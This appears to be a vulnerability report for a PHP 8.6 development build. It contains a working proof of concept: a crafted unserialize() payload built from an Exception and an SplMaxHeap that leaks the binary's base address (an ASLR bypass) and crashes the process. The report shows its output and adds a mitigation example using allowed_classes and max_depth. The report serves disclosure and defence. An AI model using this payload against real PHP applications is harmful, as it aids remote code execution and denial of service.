Description
Version: PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Researcher: Igor Sak-Sakovskiy (Positive Technologies)
Building PHP from source.
Listing 1. Building PHP from source.
$ git clone https://github.com/php/php-src.git
$ cd php-src
$ ./buildconf
$ ./configure
$ make -j8
$ ./sapi/cli/php -v
PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Copyright © The PHP Group and Contributors
Zend Engine v4.6.0-dev, Copyright © Zend by Perforce
with Zend OPcache v8.6.0-dev, Copyright ©, by Zend by Perforce
Listing 2. Proof of concept (poc.php).
<?php
// Count the "frame N" warnings raised while the corrupted trace is walked;
// the fourth one carries the leaked value.
$idx = 0;
set_error_handler(function($code, $msg) use (&$idx) {
    if (!preg_match('/frame (\d+)/', $msg, $m)) return true;
    if ($idx++ !== 3) return true;
    $addr = (int)$m[1];
    // 0x222eb88 is the offset of the leaked bucket from the text base in this build.
    $base = $addr - 0x222eb88;
    printf("text_base = 0x%x\n", $base);
    printf("uninitialized_bucket = 0x%x (text_base + 0x222eb88)\n", $addr);
    return true;
});
$n = "\x00";
// An Exception whose private "trace" property is an stdClass instead of an
// array. Its only member is an SplMaxHeap whose heap_elements refer back to
// the outer Exception (R:1). The trailing 'z' makes the parse fail after the
// objects have already been created.
unserialize(
    'O:9:"Exception":1:{' .
        's:16:"' . $n . 'Exception' . $n . 'trace";' .
        'O:8:"stdClass":2:{' .
            's:1:"0";' .
            'O:10:"SplMaxHeap":2:{' .
                'i:0;a:0:{}' .
                'i:1;a:2:{' .
                    's:5:"flags";i:0;' .
                    's:13:"heap_elements";a:2:{i:0;s:0:"";i:1;R:1;}' .
                '}' .
            '}' .
            'z' .
    '}}'
);
?>
Executing this PHP code leaks a memory address, which enables an ASLR bypass. Combined with another vulnerability (e.g. a use-after-free), this can lead to remote code execution (RCE).
Listing 3. Running the proof of concept.
$ ./php-src/sapi/cli/php poc.php
text_base = 0x1d5fddd1479
uninitialized_bucket = 0x1d600000001 (text_base + 0x222eb88)
Segmentation fault (core dumped)
The heap buffer overflow reads memory beyond the allocated bounds, which can leak the base address of the PHP binary. This ASLR bypass is a critical step towards RCE when combined with other vulnerabilities. In ZTS builds, the resulting crash takes down the whole process and thereby aborts every request it is currently serving.
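Added example, not from this report or from php-src: the application-side mitigation for this class of bug. The PoC only reaches the vulnerable path because unserialize() instantiates Exception and SplMaxHeap from attacker-controlled bytes; the documented allowed_classes and max_depth options of unserialize() refuse that before any object-specific unserialization code runs. The UserPrefs class, the helper names and every payload below are constructed for the demonstration.

```php
<?php
// Added example (not part of the bug report). Shows the unserialize() options
// that stop a payload of the PoC's shape before any Exception or SplMaxHeap is
// instantiated: allowed_classes (PHP 7.0+) and max_depth (PHP 7.4+).

// A DTO the application legitimately expects in serialized form (constructed).
final class UserPrefs
{
    public function __construct(public string $theme = 'light') {}
}

/**
 * Unserialize untrusted input with an explicit class allow-list and a depth cap.
 * Classes outside the list are materialised as __PHP_Incomplete_Class instead of
 * being instantiated, so none of their unserialization logic runs.
 */
function unserialize_untrusted(string $data, array $allowedClasses, int $maxDepth = 16): mixed
{
    // '@' only hides the warning unserialize() emits on malformed or over-deep
    // input; the false return value is what the caller must check.
    return @unserialize($data, [
        'allowed_classes' => $allowedClasses === [] ? false : $allowedClasses,
        'max_depth'       => $maxDepth,
    ]);
}

/** True when the decoded value contains an object refused by the allow-list. */
function contains_incomplete_class(mixed $value): bool
{
    if ($value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value) || is_object($value)) {
        foreach ((array) $value as $child) {
            if (contains_incomplete_class($child)) {
                return true;
            }
        }
    }
    return false;
}

function expect(bool $condition, string $what): void
{
    if (!$condition) {
        throw new RuntimeException("unexpected: $what");
    }
    echo "ok: $what\n";
}

// 1. Same outer shape as the PoC: an Exception whose private "trace" property
//    is replaced by an object. Exception is not on the allow-list, so it is
//    never constructed and its trace handling never runs.
$nul = "\x00";
$hostile = 'O:9:"Exception":1:{s:16:"' . $nul . 'Exception' . $nul . 'trace";O:8:"stdClass":0:{}}';
$decoded = unserialize_untrusted($hostile, ['UserPrefs']);
expect(!($decoded instanceof Exception), 'hostile payload did not yield an Exception');
expect(contains_incomplete_class($decoded), 'refused class surfaced as __PHP_Incomplete_Class');

// 2. Legitimate input still round-trips through the same gate.
$prefs = unserialize_untrusted(serialize(new UserPrefs('dark')), ['UserPrefs']);
expect($prefs instanceof UserPrefs && $prefs->theme === 'dark', 'allow-listed DTO round-trips');

// 3. Deep nesting is refused outright instead of being parsed.
$deep = str_repeat('a:1:{i:0;', 64) . 'i:1;' . str_repeat('}', 64);
expect(unserialize_untrusted($deep, [], 16) === false, 'over-deep payload rejected');
```

The allow-list does not remove the engine bug, which still needs the upstream fix, and it does not help code that has to accept arbitrary classes; such code should not be fed untrusted serialized data at all, and a format with explicit mapping (JSON) is the usual replacement. Callers must treat a false return, or any __PHP_Incomplete_Class inside the result, as a rejected request rather than as data.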
PHP Version
PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Operating System
No response